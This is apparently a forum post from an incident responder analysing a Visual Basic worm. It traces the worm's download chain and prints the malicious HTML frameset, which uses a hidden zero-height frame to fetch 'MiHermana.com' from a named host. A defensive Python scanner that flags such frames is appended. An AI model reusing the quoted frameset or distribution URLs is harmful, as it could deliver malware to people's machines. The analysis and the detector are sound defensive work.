I don't know if this qualifies as an Incident but...
I have found a couple of txt on 'a' windows desktop..
Generated by a csrss.exe executable
Reversing a little bit the vb thingy I found it downloads from here:

http://tjuegost.info/downloads.html

an encrypted string (28/08/2008)

043143143147348345345048045148143148144349143040345.

using this that finally seems to be the following url:

http://cfot-os.tk/   (nothing useful here http://samspade.org/whois/cfotos.tk)

 which tries to download (and execute?) a .com file called "miHermana.com" using this html

''' 
<html>
<head>
<title>cfotos.tk</title>
<meta name="description" content="cfotos.tk">
<meta name="keywords" content="cfotos.tk">
</head>
<frameset rows="*,0" framespacing="0" border="0" frameborder="NO">
<frame src="http://usuarios.lycos.es/nuevo8888/MiHermana.com" name="dot_tk_frame_content" scrolling="auto" noresize>
 </frameset>
<noframes>
<body>
</body>
</noframes>

</html>
'''

bah..
etc!
VisualBasicW32WORM
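
A defender-side check for the pattern in the HTML above, added here as an example and not part of the original note: it flags frames that load a Windows-executable path from a different host and records whether the frameset contains a zero-sized row or column. The function names, the extension list and the sample hosts are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Extensions Windows will run directly; ".com" is the one the page's frame used.
EXEC_EXT = (".com", ".exe", ".scr", ".pif", ".bat", ".cmd")


class FrameScanner(HTMLParser):
    """Collect frame/iframe sources and note a zero-sized frameset row/col."""

    def __init__(self):
        super().__init__()
        self.sources = []
        self.hidden_layout = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "frameset":
            sizes = (a.get("rows") or "") + "," + (a.get("cols") or "")
            self.hidden_layout |= "0" in [s.strip() for s in sizes.split(",")]
        elif tag in ("frame", "iframe") and a.get("src"):
            self.sources.append(a["src"])


def suspicious_frames(html, page_host):
    """Return findings for frames that load an executable from another host."""
    scanner = FrameScanner()
    scanner.feed(html)
    findings = []
    for src in scanner.sources:
        url = urlsplit(src)
        # Test the path only: "http://example.com" has a .com host, not a .com file.
        is_exec = url.path.lower().endswith(EXEC_EXT)
        off_site = bool(url.hostname) and url.hostname.lower() != page_host.lower()
        if is_exec and off_site:
            findings.append({"src": src, "hidden_frameset": scanner.hidden_layout})
    return findings


# Constructed sample modelled on the page's frameset; hosts are placeholders.
SAMPLE = """<html><frameset rows="*,0" framespacing="0" border="0">
<frame src="http://files.example.test/user8888/MiHermana.com" noresize>
</frameset></html>"""
BENIGN = '<frameset rows="*,0"><frame src="http://portal.example.com"></frameset>'

if __name__ == "__main__":
    print(suspicious_frames(SAMPLE, "redirector.example.test"))
    print(suspicious_frames(BENIGN, "redirector.example.test"))
```

The benign sample shows why the extension test runs on the URL path: a frame pointing at a `.com` domain with no file path is not flagged.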